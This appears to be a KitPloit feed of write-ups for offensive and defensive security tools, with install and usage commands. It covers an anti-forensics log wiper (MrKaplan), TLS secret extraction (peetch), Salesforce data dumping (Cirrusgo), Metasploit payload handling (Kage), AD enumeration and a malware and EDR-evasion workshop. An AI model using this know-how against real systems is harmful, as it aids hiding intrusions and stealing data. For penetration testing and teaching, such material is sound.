πŸ”’
❌
There are new articles available, click to refresh the page.
Yesterday β€” 9 August 2022KitPloit - PenTest & Hacking Tools

MrKaplan - Tool Aimed To Help Red Teamers To Stay Hidden By Clearing Evidence Of Execution

9 August 2022 at 12:30
By: Zion3R


MrKaplan is a tool aimed to help red teamers to stay hidden by clearing evidence of execution. It works by saving information such as the time it ran, snapshot of files and associate each evidence to the related user.

This tool is inspired by MoonWalk, a similar tool for Unix machines.

You can read more about it in the wiki page.


Features

  • Stopping event logging.
  • Clearing files artifacts.
  • Clearing registry artifacts.
  • Can run for multiple users.
  • Can run as user and as admin (Highly recommended to run as admin).
  • Can save timestamps of files.
  • Can exclude certian operations and leave artifacts to blue teams.

Usage

  • Before you start your operations on the computer, run MrKaplan with begin flag and whenever your finish run it again with end flag.
  • DO NOT REMOVE MrKaplan registry key, otherwise MrKaplan will not be able to use the information.

IOCs

  • Powershell process that access to the artifacts mentioned in the wiki page.

  • Powershell importing weird base64 blob.

  • Powershell process that performs Token Manipulation.

  • MrKaplan's registry key: HKCU:\Software\MrKaplan.

Acknowledgements

Disclaimer

I'm not responsible in any way for any kind of damage that is done to your computer / program as cause of this project. I'm happily accept contribution, make a pull request and I will review it!



Before yesterdayKitPloit - PenTest & Hacking Tools

Smap - A Drop-In Replacement For Nmap Powered By Shodan.Io

8 August 2022 at 12:30
By: Zion3R


Smap is a replica of Nmap which uses shodan.io's free API for port scanning. It takes same command line arguments as Nmap and produces the same output which makes it a drop-in replacament for Nmap.


Features

  • Scans 200 hosts per second
  • Doesn't require any account/api key
  • Vulnerability detection
  • Supports all nmap's output formats
  • Service and version fingerprinting
  • Makes no contact to the targets

Installation

Binaries

You can download a pre-built binary from here and use it right away.

Manual

go install -v github.com/s0md3v/smap/cmd/[email protected]

Confused or something not working? For more detailed instructions, click here

AUR pacakge

Smap is available on AUR as smap-git (builds from source) and smap-bin (pre-built binary).

Homebrew/Mac

Smap is also avaible on Homebrew.

brew update
brew install smap

Usage

Smap takes the same arguments as Nmap but options other than -p, -h, -o*, -iL are ignored. If you are unfamiliar with Nmap, here's how to use Smap.

Specifying targets

smap 127.0.0.1 127.0.0.2

You can also use a list of targets, seperated by newlines.

smap -iL targets.txt

Supported formats

1.1.1.1         // IPv4 address
example.com // hostname
178.23.56.0/8 // CIDR

Output

Smap supports 6 output formats which can be used with the -o* as follows

smap example.com -oX output.xml

If you want to print the output to terminal, use hyphen (-) as filename.

Supported formats

oX    // nmap's xml format
oG // nmap's greppable format
oN // nmap's default format
oA // output in all 3 formats above at once
oP // IP:PORT pairs seperated by newlines
oS // custom smap format
oJ // json

Note: Since Nmap doesn't scan/display vulnerabilities and tags, that data is not available in nmap's formats. Use -oS to view that info.

Specifying ports

Smap scans these 1237 ports by default. If you want to display results for certain ports, use the -p option.

smap -p21-30,80,443 -iL targets.txt

Considerations

Since Smap simply fetches existent port data from shodan.io, it is super fast but there's more to it. You should use Smap if:

You want

  • vulnerability detection
  • a super fast port scanner
  • results for most common ports (top 1237)
  • no connections to be made to the targets

You are okay with

  • not being able to scan IPv6 addresses
  • results being up to 7 days old
  • a few false negatives


BlackStone - Pentesting Reporting Tool

7 August 2022 at 12:30
By: Zion3R

Pentesting Reporting Tool (1)


BlackStone project or "BlackStone Project" is a tool created in order to automate the work of drafting and submitting a report on audits of ethical hacking or pentesting.

In this tool we can register in the database the vulnerabilities that we find in the audit, classifying them by internal, external audit or wifi, in addition, we can put your description and recommendation, as well as the level of severity and effort for its correction. This information will then help us generate in the report a criticality table as a global summary of the vulnerabilities found.

We can also register a company and, just by adding its web page, the tool will be able to find subdomains, telephone numbers, social networks, employee emails...


Pentesting Reporting Tool (2)

Docker Install

Install Docker

Install docker-compose
Install BlackStone
git clone https://github.com/micro-joan/BlackStone
cd BlackStone
docker-compose up -d

User: blackstone

Password: blackstone

Manual Install

  • First we must download an Apache server to host the tool, in my case I use Mamp (I recommend following these steps): https://www.mamp.info/en/downloads/
  • We will download the content of this repository and we will have 2 folders (BlackStone and BBDD)
  • Once the server starts we will go to c://MAMP/htdocs and paste all the contents of the downloaded folder "BlackStone"
  • For the application to work we will have to import the database, we will go to our browser and write "localhost/phpMyAdmin/", you have the database connection file in the folder BlackStone/conexion.php
  • We will create a database called blackstone and import the data from the downloaded BBDD folder
  • Log in to BlackStone with the username and password "blackstone"

Use

First you need to go to profile settings and add Hunter.io and haveibeenpwned.com tokens:

Pentesting Reporting Tool (3)

After having vulnerabilities in the database, we will go to the audited client and we will register a client along with their web page, once registered we can go to customer details and we can see the following information:

THE USE OF THIS APPLICATION IS FOR PROFESSIONAL USE, THE AUTHOR IS NOT RESPONSIBLE FOR A MISUSE EMPLOYED

  • Name of business owner
  • Social networks of the company owner
  • Email and telephone number of the owner of the company
  • Exposed password check on the company owner's deep web
  • Subdomains of the website as well as information of interest found in google
  • Emails of company workers

Pentesting Reporting Tool (4)

Once we have the company that we are going to audit registered in the database, we will create a report, adding the date, name of the report and the company to which will be audited. When we register the report, we will give it edit and then we will select the vulnerabilities that we want to appear in the report:

Pentesting Reporting Tool (5)

Finally, we will generate the report by clicking on the "overview report" button, and later we will save the page that is generated as ".mht", then we will open it with Word to be able to work on the generated report:

Pentesting Reporting Tool (6)



Pict - Post-Infection Collection Toolkit

6 August 2022 at 12:30
By: Zion3R


This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.

If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.


How to use

The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without.

Data will be collected in two forms. First is in the form of summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser module will output a browser_extensions.txt file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.

The second are complete files collected from the filesystem. These are stored in an artifacts subfolder inside the collection folder.

Syntax

The script is very simple to run. It takes only one parameter, which is required, to pass in a configuration script in JSON format:

./pict.py -c /path/to/config.json

The configuration script describes what the script will collect, and how. It should look something like this:

collection_dest

This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared.

Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.

all_users

If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.

collectors

PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.

The collectors data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused.

settings

This dictionary provides global settings.

keepLSData specifies whether the lsregister.txt file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)

zipIt specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.

moduleSettings

This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts being used with the browser module.

There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.

collectArtifacts specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.

Writing your own modules

Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py), and they must be placed in the collectors folder. A new Collector module can be easily created by duplicating the collectors/template.py file and customizing it for your own use.

def __init__(self, collectionPath, allUsers)

This method can be overridden if necessary, but the super Collector.init() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.

def printStartInfo(self)

This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.

def applySettings(self, settingsDict)

This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collection class can handle any settings that it defines.

def collect(self)

This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.

If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.

When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.

Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.

Credits

Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.



Peetch - An eBPF Playground

5 August 2022 at 12:30
By: Zion3R


peetch is a collection of tools aimed at experimenting with different aspects of eBPF to bypass TLS protocol protections.

Currently, peetch includes two subcommands. The first called dump aims to sniff network traffic by associating information about the source process with each packet. The second called tls allows to identify processes using OpenSSL to extract cryptographic keys.

Combined, these two commands make it possible to decrypt TLS exchanges recorded in the PCAPng format.


Installation

peetch relies on several dependencies including non-merged modifications of bcc and Scapy. A Docker image can be easily built in order to easily test peetch using the following command:

docker build -t quarkslab/peetch .

Commands Walk Through

The following examples assume that you used the following command to enter the Docker image and launch examples within it:

docker run --privileged --network host --mount type=bind,source=/sys,target=/sys --mount type=bind,source=/proc,target=/proc --rm -it quarkslab/peetch

dump

This sub-command gives you the ability to sniff packets using an eBPF TC classifier and to retrieve the corresponding PID and process names with:

peetch dump
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https S / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 SA / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https A / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https PA / Raw / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 A / Padding

Note that for demonstration purposes, dump will only capture IPv4 based TCP segments.

For convenience, the captured packets can be store to PCAPng along with process information using --write:

peetch dump --write peetch.pcapng
^C

This PCAPng can easily be manipulated with Wireshark or Scapy:

scapy
>>> l = rdpcap("peetch.pcapng")
>>> l[0]
<Ether dst=00:1c:42:00:00:18 src=00:1c:42:54:f3:34 type=IPv4 |<IP version=4 ihl=5 tos=0x0 len=60 id=11088 flags=DF frag=0 ttl=64 proto=tcp chksum=0x4bb1 src=10.211.55.10 dst=208.97.177.124 |<TCP sport=53054 dport=https seq=631406526 ack=0 dataofs=10 reserved=0 flags=S window=64240 chksum=0xc3e9 urgptr=0 options=[('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1272423534, 0)), ('NOP', None), ('WScale', 7)] |<Padding load='\x00\x00' |>>>>
>>> l[0].comment
b'curl/1289909'

tls

This sub-command aims at identifying process that uses OpenSSl and makes it is to dump several things like plaintext and secrets.

By default, peetch tls will only display one line per process, the --directions argument makes it possible to display the exchanges messages:

peetch tls --directions
<- curl (1291078) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256
> curl (1291078) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

Displaying OpenSSL buffer content is achieved with --content.

peetch tls --content
<- curl (1290608) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

0000 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A GET / HTTP/1.1..
0010 48 6F 73 74 3A 20 77 77 77 2E 70 65 72 64 75 2E Host: www.perdu.
0020 63 6F 6D 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A com..User-Agent:
0030 20 63 75 72 6C 2F 37 2E 36 38 2E 30 0D 0A 41 63 curl/7.68.0..Ac

-> curl (1290608) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

0000 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
0010 0A 44 61 74 65 3A 20 54 68 75 2C 20 31 39 20 4D .Date: Thu, 19 M
0020 61 79 20 32 30 32 32 20 31 38 3A 31 36 3A 30 31 ay 2022 18:16:01
0030 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70 GMT..Server: Ap

The --secrets arguments will display TLS Master Secrets extracted from memory. The following example leverages --write to write master secrets to discuss to simplify decruypting TLS messages with Scapy:

$ (sleep 5; curl https://www.perdu.com/?name=highly%20secret%20information --tls-max 1.2 -http1.1) &

# peetch tls --write &
curl (1293232) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

# peetch dump --write traffic.pcapng
^C

# Add the master secret to a PCAPng file
$ editcap --inject-secrets tls,1293232-master_secret.log traffic.pcapng traffic-ms.pcapng

$ scapy
>>> load_layer("tls")
>>> conf.tls_session_enable = True
>>> l = rdpcap("traffic-ms.pcapng")
>>> l[13][TLS].msg
[<TLSApplicationData data='GET /?name=highly%20secret%20information HTTP/1.1\r\nHost: www.perdu.com\r\nUser-Agent: curl/7.68.0\r\nAccept: */*\r\n\r\n' |>]

Limitations

By design, peetch only supports OpenSSL and TLS 1.2.



Cirrusgo - A Fast Tool To Scan SAAS, PAAS App Written In Go

4 August 2022 at 12:30
By: Zion3R


A fast tool to scan SAAS,PAAS App written in Go

SAAS App Support :

  • salesforce
  • contentful (next version)

Note flag -o output not working

install : golang 1.18Ver

go install -v github.com/Ph33rr/cirrusgo/cmd/[email protected]
or
go install -v github.com/Ph33rr/CirrusGo/cmd/[email protected]


Help:

cirrusgo --help
  ______ _                           ______
/ ____/(_)_____ _____ __ __ _____ / ____/____
/ / / // ___// ___// / / // ___// / __ / __ \
/ /___ / // / / / / /_/ /(__ )/ /_/ // /_/ /
\____//_//_/ /_/ \__,_//____/ \____/ \____/ v0.0.1

cirrusgo --help

-u, --url <URL> Define single URL to fuzz
-l, --list Show App List
-c, --check only check endpoint
-V, --version Show current version
-h, --help Display its help

[cirrusgo [app] [options] ..]
cirrusgo salesforce --help

-u, --url <URL> Define single URL
-c, --check only check endpoint
-lobj, --listobj pull the object list.
-gobj --getobj pull the object.
-obj --objects set the object name. Default value is "User" object.
Juicy Objects: Case,Account,User,Contact,Document,Cont
entDocument,ContentVersion,ContentBody,CaseComment,Not
e,Employee,Attachment,EmailMessage,CaseExternalDocumen
t,Attachment,Lead,Name,EmailTemplate,EmailMessageRelation
-gre --getrecord pull the Record id.
-re --recordid set the recode id to dump the record
-cw --chkWritable check all Writable objects
-f, --full dump all pages of objects.
--dump
-H, --header <HEADER> Pass custom header to target
-proxy, --proxy <URL> Use proxy to fuzz

-o, --output <FILE> File to save results

[flags payload]
[command: cirrusgo salesforce --payload options]
-payload, --payload Generator payload for test manual Default "ObjectList"

GetItems -obj set object
-page set page
-pages set pageSize
GetRecord -re set recoder id
WritableOBJ -obj set object
SearchObj -obj set object
-page set page
-pages set pageSize
AuraContext -fwuid set UID
-App set AppName
-markup set markup
ObjectList no options
Dump no options
-h, --help Display its help

Example :

cirrusgo salesforce -u https://loclhost -gobj

dump:

cirrusgo salesforce -u https://localhost/ -f

check Writable Objects:

cirusgo salesforce -u https://localhost/ -cw



Kage - Graphical User Interface For Metasploit Meterpreter And Session Handler

3 August 2022 at 12:30
By: Zion3R

Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.
For now it only supports windows/meterpreter & android/meterpreter.


Getting Started

Please follow these instructions to get a copy of Kage running on your local machine without any problems.

Prerequisites

Installing

You can install Kage binaries from here.

for developers

to run the app from source code:

# Download source code
git clone https://github.com/WayzDev/Kage.git

# Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev

# to build project
yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

For Generating APK Payload select Raw format in dropdown list.

Screenshots







Disclaimer

I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.

Twitter: @iFalah

Email: [email protected]

Credits

Metasploit Framework - (c) Rapid7 Inc. 2012 (BSD License)
http://www.metasploit.com/

node-msfrpc - (c) Tomas Gonzalez Vivo. 2017 (Apache License)
https://github.com/tomasgvivo/node-msfrpc

electron-vue - (c) Greg Holguin. 2016 (MIT)
https://github.com/SimulatedGREG/electron-vue


This project was generated with electron-vue using vue-cli. Documentation about the original structure can be found here.



SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.

1 August 2022 at 12:30
By: Zion3R


Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.


Installation

Using pipenv (recommended method)

sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd silenthound
pipenv install

This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.

From requirements.txt (legacy)

This method is not recommended because python-ldap can cause many dependency errors.

Install dependencies with pip:

python3 -m pip install -r requirements.txt
python3 silenthound.py -h

Usage

$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain

Quietly enumerate an Active Directory environment.

positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP passwo rd - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.

About

A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.

Using the -o flag will result in output files for each section normally in stdout. The files created using all flags will be:

-rw-r--r--  1 kali  kali   122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r-- 1 kali kali 60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r-- 1 kali kali 2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r-- 1 kali kali 89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r-- 1 kali kali 1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r-- 1 kali kali 66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r-- 1 kali kali 529 Jun 30 11:37 BASENAME-users.txt

Author

Roadmap

  • Parse users belonging to specific OUs
  • Refine output
  • Continuously cleanup code
  • Move towards OOP

For additional feature requests please submit an issue and add the enhancement tag.



PR-DNSd - Passive-Recursive DNS Daemon

1 August 2022 at 02:09
By: Zion3R


Passive-Recursive DNS daemon.


Quickstart

nameserver 127.0.0.1 | sudo tee /etc/resolv.conf dig google.com dig -x $(dig +short google.com)">
go get github.com/korc/PR-DNSd
sudo setcap cap_net_bind_service,cap_sys_chroot=ep go/bin/PR-DNSd
go/bin/PR-DNSd -upstream 9.9.9.9:53 -listen 127.0.0.1:53
echo nameserver 127.0.0.1 | sudo tee /etc/resolv.conf
dig google.com
dig -x $(dig +short google.com)

If you can't use setcap, you have to use -chroot "" and -listen :<high_port> options, or run as root.

Use cases

  • run as local host DNS service, to fix your netstat/tcpview/lsof etc. output
  • as enterprise-internal DNS server, to also be able to do meaningful EDR/IR and log analysis
  • as cloud service, to also collect Passive DNS data from non-enterprise (home, BYOD etc.) devices
    • hint: you probably want to configure DDoS protection options
  • in cloud as DNS-over-TLS server, to additionally provide private DNS for supporting devices (ex: Android 9's private DNS setting)
    • ex: domain pattern based firewall/proxy configuration for mobile devices

Running as your own private server for Android9's Private DNS settings

After appropriate setcap, run:

PR-DNSd -tlslisten :853 -cert YOUR_SERVER_CRT_KEY_PEM -upstream 1.1.1.1:53 -store pr-dnsd

Options

-cert string
TCP-TLS listener certificate (required for tls listener)
-chroot string
chroot to directory after start (default "/var/tmp")
-count int
Count of replies allowed before debounce delay is applied (default 100)
-ctmout string
Client timeout for upstream queries
-debounce string
Required time duration between UDP replies to single IP to prevent DoS (default "200ms")
-key string
TCP-TLS certificate key (default same as -cert value)
-listen string
listen address (default ":53")
-silent
Don't report normal data
-store string
Store PTR data to specified file
-tlslisten string
TCP-TLS listener address (default ":853")
-upstream string
upstream DNS serv er (tcp-tls:// prefix for DoT) (default "1.1.1.1:53")
(with tls and chroot, ensure ca-certificates and resolv.conf in chroot are properly set up)


Maldev-For-Dummies - A Workshop About Malware Development

29 July 2022 at 12:30
By: Zion3R


In the age of EDR, red team operators cannot get away with using pre-compiled payloads anymore. As such, malware development is becoming a vital skill for any operator. Getting started with maldev may seem daunting, but is actually very easy. This workshop will show you all you need to get started!

This repository contains the slides and accompanying exercises for the 'MalDev for Dummies' workshop that will be facilitated at Hack in Paris 2022 (additional conferences TBA). The exercises will remain available here to be completed at your own pace - the learning process should never be rushed! Issues and pull requests to this repo with questions and/or suggestions are welcomed.

Disclaimer: Malware development is a skill that can -and should- be used for good, to further the field of (offensive) security and keep our defenses sharp. If you ever use this skillset to perform activities that you have no authorization for, you are a bigger dummy than this workshop is intended for and you should skidaddle on out of here.

Β 

Workshop Description

With antivirus (AV) and Enterprise Detection and Response (EDR) tooling becoming more mature by the minute, the red team is being forced to stay ahead of the curve. Gone are the times of execute-assembly and dropping unmodified payloads on disk - if you want your engagements to last longer than a week you will have to step up your payload creation and malware development game. Starting out in this field can be daunting however, and finding the right resources is not always easy.

This workshop is aimed at beginners in the space and will guide you through your first steps as a malware developer. It is aimed primarily at offensive practitioners, but defensive practitioners are also very welcome to attend and broaden their skillset.

During the workshop we will go over some theory, after which we will set you up with a lab environment. There will be various exercises that you can complete depending on your current skillset and level of comfort with the subject. However, the aim of the workshop is to learn, and explicitly not to complete all the exercises. You are free to choose your preferred programming language for malware development, but support during the workshop is provided primarily for the C# and Nim programming languages.

During the workshop, we will discuss the key topics required to get started with building your own malware. This includes (but is not limited to):

  • The Windows API
  • Filetypes and execution methods
  • Shellcode execution and injection
  • AV and EDR evasion methods

Getting Started

To get started with malware development, you will need a dev machine so that you are not bothered by any defensive tooling that may run on your host machine. I prefer Windows for development, but Linux or MacOS will do just as fine. Install your IDE of choice (I use VS Code for almost everything except C#, for which I use Visual Studio, and then install the toolchains required for your MalDev language of choice:

  • C#: Visual Studio will give you the option to include the .NET packages you will need to develop C#. If you want to develop without Visual Studio, you can download the .NET Framework separately.
  • Nim lang: Follow the download instructions. Choosenim is a convenient utility that can be used to automate the installation process.
  • Golang (not supported during workshop):Follow the download instructions.
  • Rust (not supported during workshop): Rustup can be used to install Rust along with the required toolchains.

Don't forget to disable Windows Defender or add the appropriate exclusions, so your hard work doesn't get quarantined!

β„Ή
Note: Oftentimes, package managers such as apt or software management tools such as Chocolatey can be used to automate the installation and management of dependencies in a convenient and repeatable way. Be conscious however that versions in package managers are often behind on the real thing! Below is an example Chocolatey command to install the mentioned tooling all at once.
 choco install -y nim choosenim go rust vscode visualstudio2019community dotnetfx

Compiling programs

Both C# and Nim are compiled languages, meaning that a compiler is used to translate your source code into binary executables of your chosen format. The process of compilation differs per language.

C#

C# code (.cs files) can either be compiled directly (with the csc utility) or via Visual Studio itself. Most source code in this repo (except the solution to bonus exercise 3) can be compiled as follows.

β„Ή
Note: Make sure you run the below command in a "Visual Studio Developer Command Prompt" so it knows where to find csc, it is recommended to use the "x64 Native Tools Command Prompt" for your version of Visual Studio.
csc filename.exe /unsafe

You can enable compile-time optimizations with the /optimize flag. You can hide the console window by adding /target:winexe as well, or compile as DLL with /target:library (but make sure your code structure is suitable for this).

Nim

Nim code (.nim files) is compiled with the nim c command. The source code in this repo can be compiled as follows.

nim c filename.nim

If you want to optimize your build for size and strip debug information (much better for opsec!), you can add the following flags.

nim c -d:release -d:strip --opt:size filename.nim

Optionally you can hide the console window by adding --app:gui as well.

Dependencies

Nim

Most Nim programs depend on a library called "Winim" to interface with the Windows API. You can install the library with the Nimble package manager as follows (after installing Nim):

nimble install winim

Resources

The workshop slides reference some resources that you can use to get started. Additional resources are listed in the README.md files for every exercise!



TerraformGoat - "Vulnerable By Design" Multi Cloud Deployment Tool

28 July 2022 at 12:30
By: Zion3R


TerraformGoat is selefra research lab's "Vulnerable by Design" multi cloud deployment tool.

Currently supported cloud vendors include Alibaba Cloud, Tencent Cloud, Huawei Cloud, Amazon Web Services, Google Cloud Platform, Microsoft Azure.


Scenarios

ID Cloud Service Company Types Of Cloud Services Vulnerable Environment
1 Alibaba Cloud Networking VPC Security Group Open All Ports
2 Alibaba Cloud Networking VPC Security Group Open Common Ports
3 Alibaba Cloud Object Storage Bucket HTTP Enable
4 Alibaba Cloud Object Storage Object ACL Writable
5 Alibaba Cloud Object Storage Object ACL Readable
6 Alibaba Cloud Object Storage Special Bucket Policy
7 Alibaba Cloud Object Storage Bucket Public Access
8 Alibaba Cloud Object Storage Object Public Access
9 Alibaba Cloud Object Storage Bucket Logging Disable
10 Alibaba Cloud Object Storage Bucket Policy Readable
11 Alibaba Cloud Object Storage Bucket Object Traversal
12 Alibaba Cloud Object Storage Unrestricted File Upload
13 Alibaba Cloud Object Storage Server Side Encryption No KMS Set
14 Alibaba Cloud Object Storage Server Side Encryption Not Using BYOK
15 Alibaba Cloud Elastic Computing Service ECS SSRF
16 Alibaba Cloud Elastic Computing Service ECS Unattached Disks Are Unencrypted
17 Alibaba Cloud Elastic Computing Service ECS Virtual Machine Disks Are Unencrypted
18 Tencent Cloud Networking VPC Security Group Open All Ports
19 Tencent Cloud Networking VPC Security Group Open Common Ports
20 Tencent Cloud Object Storage Bucket ACL Writable
21 Tencent Cloud Object Storage Bucket ACL Readable
22 Tencent Cloud Object Storage Bucket Public Access
23 Tencent Cloud Object Storage Object Public Access
24 Tencent Cloud Object Storage Unrestricted File Upload
25 Tencent Cloud Object Storage Bucket Object Traversal
26 Tencent Cloud Object Storage Bucket Logging Disable
27 Tencent Cloud Object Storage Server Side Encryption Disable
28 Tencent Cloud Elastic Computing Service CVM SSRF
29 Tencent Cloud Elastic Computing Service CBS Storage Are Not Used
30 Tencent Cloud Elastic Computing Service CVM Virtual Machine Disks Are Unencrypted
31 Huawei Cloud Networking ECS Unsafe Security Group
32 Huawei Cloud Object Storage Object ACL Writable
33 Huawei Cloud Object Storage Special Bucket Policy
34 Huawei Cloud Object Storage Unrestricted File Upload
35 Huawei Cloud Object Storage Bucket Object Traversal
36 Huawei Cloud Object Storage Wrong Policy Causes Arbitrary File Uploads
37 Huawei Cloud Elastic Computing Service ECS SSRF
38 Huawei Cloud Relational Database Service RDS Mysql Baseline Checking Environment
39 Amazon Web Services Networking VPC Security Group Open All Ports
40 Amazon Web Services Networking VPC Security Group Open Common Ports
41 Amazon Web Services Object Storage Object ACL Writable
42 Amazon Web Services Object Storage Bucket ACL Writable
43 Amazon Web Services Object Storage Bucket ACL Readable
44 Amazon Web Services Object Storage MFA Delete Is Disable
45 Amazon Web Services Object Storage Special Bucket Policy
46 Amazon Web Services Object Storage Bucket Object Traversal
47 Amazon Web Services Object Storage Unrestricted File Upload
48 Amazon Web Services Object Storage Bucket Logging Disable
49 Amazon Web Services Object Storage Bucket Allow HTTP Access
50 Amazon Web Services Object Storage Bucket Default Encryption Disable
51 Amazon Web Services Elastic Computing Service EC2 SSRF
52 Amazon Web Services Elastic Computing Service Console Takeover
53 Amazon Web Services Elastic Computing Service EBS Volumes Are Not Used
54 Amazon Web Services Elastic Computing Service EBS Volumes Encryption Is Disabled
55 Amazon Web Services Elastic Computing Service Snapshots Of EBS Volumes Are Unencrypted
56 Amazon Web Services Identity and Access Management IAM Privilege Escalation
57 Google Cloud Platform Object Storage Object ACL Writable
58 Google Cloud Platform Object Storage Bucket ACL Writable
59 Google Cloud Platform Object Storage Bucket Object Traversal
60 Google Cloud Platform Object Storage Unrestricted File Upload
61 Google Cloud Platform Elastic Computing Service VM Command Execution
62 Microsoft Azure Object Storage Blob Public Access
63 Microsoft Azure Object Storage Container Blob Traversal
64 Microsoft Azure Elastic Computing Service VM Command Execution


Install

TerraformGoat is deployed using Docker images and therefore requires Docker Engine environment support, Docker Engine installation can be found in https://docs.docker.com/engine/install/

Depending on the cloud service provider you are using, choose the corresponding installation command.

Alibaba Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash

Tencent Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker run -itd --name terraformgoat_tencentcloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker exec -it terraformgoat_tencentcloud_0.0.4 /bin/bash

Huawei Cloud

